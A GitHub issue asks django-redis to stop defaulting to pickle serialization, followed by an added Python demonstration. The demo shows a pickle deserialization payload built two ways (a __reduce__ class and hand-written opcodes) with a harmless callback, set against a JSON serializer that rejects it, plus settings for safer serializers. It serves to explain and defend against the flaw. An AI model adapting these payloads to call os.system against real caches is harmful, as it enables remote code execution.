
Security concerns about pickle for serialization #424

Open
@hartwork

Description


Hi!

Before you hit the close button right away, please hear me out:

I'm aware of #161 but it's at least in part about switching to JSON in particular and I think back then the msgpack serializer was not yet around...

I'm opening this ticket because using pickle means that if someone gets control over Redis, that gets them arbitrary code execution in django-redis for free, just because someone didn't think or know of changing the default serializer from pickle to something else. I think it's just too crazy of a default — let's use anything but pickle for a default, please. 🙏

Thanks for your reconsideration!
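To make the issue concrete, the following added example (it is not part of the issue or of django-redis itself) shows what "control over Redis" buys an attacker when the cache serializer is pickle: a value stored under any cache key is executed, not merely decoded, the moment the application reads it, and the same bytes are simply rejected by a JSON serializer. The names `attacker_callback`, `EXECUTED`, `Exploit`, `pickle_cache_get`, `json_cache_get` and the two `CACHES` dicts are illustrative; the serializer class paths in the settings fragments are the ones django-redis documents, but the module is not imported, so the block runs offline.

```python
"""Why a pickle cache serializer turns Redis write access into code execution.

Added example, not django-redis code. attacker_callback/EXECUTED stand in for
a real sink such as os.system; the settings dicts are illustrative fragments.
"""
import json
import pickle

# Benign sink: a real payload would name os.system, subprocess.Popen, etc.
# Recording the call proves the callable ran inside pickle.loads().
EXECUTED = []


def attacker_callback(arg):
    EXECUTED.append(arg)
    return arg


class Exploit:
    """Object whose pickle encodes 'call attacker_callback(...)'.

    __reduce__ tells pickle to store (callable, args); on load the callable
    is resolved by module and name and invoked before any application code
    ever sees the 'deserialized value'.
    """

    def __reduce__(self):
        return (attacker_callback, ("ran during pickle.loads",))


def build_malicious_cache_value():
    """Bytes an attacker with Redis write access stores under a cache key."""
    return pickle.dumps(Exploit(), protocol=pickle.HIGHEST_PROTOCOL)


def build_malicious_cache_value_raw():
    """Same effect with hand-written protocol-0 opcodes: the attacker needs no
    Python class at all, only the importable module/name of a callable.
    c<module>\\n<name>\\n pushes a global, ( marks, S'..' pushes a string,
    t builds the tuple, R calls callable(*args), . stops."""
    module = attacker_callback.__module__.encode()
    return b"c" + module + b"\nattacker_callback\n(S'hand-built'\ntR."


def pickle_cache_get(blob):
    """Model of the default django-redis path (PickleSerializer)."""
    return pickle.loads(blob)  # untrusted bytes: code runs before return


def json_cache_get(blob):
    """Model of a JSON serializer: foreign bytes raise, nothing executes."""
    return json.loads(blob.decode("utf-8"))


# Settings fragments. Omitting SERIALIZER selects
# django_redis.serializers.pickle.PickleSerializer (the default the issue
# objects to); the second fragment switches to JSON. The msgpack option is
# "django_redis.serializers.msgpack.MSGPackSerializer".
CACHES_DEFAULT_PICKLE = {
    "default": {
        "BACKEND": "django_redis.cache.RedisCache",
        "LOCATION": "redis://127.0.0.1:6379/1",
        "OPTIONS": {"CLIENT_CLASS": "django_redis.client.DefaultClient"},
    }
}

CACHES_JSON = {
    "default": {
        "BACKEND": "django_redis.cache.RedisCache",
        "LOCATION": "redis://127.0.0.1:6379/1",
        "OPTIONS": {
            "CLIENT_CLASS": "django_redis.client.DefaultClient",
            "SERIALIZER": "django_redis.serializers.json.JSONSerializer",
        },
    }
}


def demo(blob=None):
    """Feed one attacker-controlled value through both deserializers."""
    blob = blob if blob is not None else build_malicious_cache_value()
    EXECUTED.clear()
    pickle_result = pickle_cache_get(blob)
    pickle_ran = bool(EXECUTED)
    EXECUTED.clear()
    try:
        json_cache_get(blob)
        json_rejected = False
    except ValueError:  # UnicodeDecodeError and JSONDecodeError both qualify
        json_rejected = True
    return {
        "pickle_ran": pickle_ran,
        "pickle_result": pickle_result,
        "json_ran": bool(EXECUTED),
        "json_rejected": json_rejected,
    }


if __name__ == "__main__":
    print(demo())
    print(demo(build_malicious_cache_value_raw()))
```

Two caveats when applying the fix: JSON and msgpack only round-trip plain data types, so any code that currently caches arbitrary Python objects (model instances, datetimes, custom classes) needs adjusting, and changing the serializer does not replace Redis-side controls (AUTH, TLS, network isolation), it just stops a Redis compromise from escalating into the Django process.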
